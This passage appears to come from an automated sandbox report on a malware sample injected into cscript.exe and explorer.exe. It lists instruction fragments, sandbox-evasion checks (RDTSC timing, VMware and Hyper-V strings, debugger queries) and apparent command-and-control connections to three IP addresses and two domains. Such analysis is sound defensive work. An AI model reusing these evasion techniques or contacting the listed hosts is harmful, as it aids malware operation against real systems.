          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_027762F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_027853FC push eax; retf
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B47C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B41B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B412 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278C4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02785CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02784D71 push ss; iretd
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02785D38 pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000027785F4 second address: 00000000027785FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 000000000277898E second address: 0000000002778994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 4596 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6704 | Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
          Source: explorer.exe, 00000005.00000000.689554212.000000000FCDF000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.689491602.000000000FCA3000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.684592280.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.679024096.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.685546854.000000000A9D4000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA}
          Source: explorer.exe, 00000005.00000000.674530269.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.684825933.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.677883212.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 1_2_020706DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 1_2_0207099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 1_2_020709DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 1_2_02070A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 1_2_020708EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0479746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04790050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04848CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04844015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04832073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04841074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04797D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04794120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04828DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04793A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04804257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0482D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0483138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04845BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0477DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0478EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0483131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04848F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.129.33 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.40.211 80
          Source: C:\Windows\explorer.exe | Domain query: www.manageoceanaccount.com
          Source: C:\Windows\explorer.exe | Domain query: www.cwdelrio.com
          Source: C:\Windows\explorer.exe | Network Connect: 89.46.109.25 80
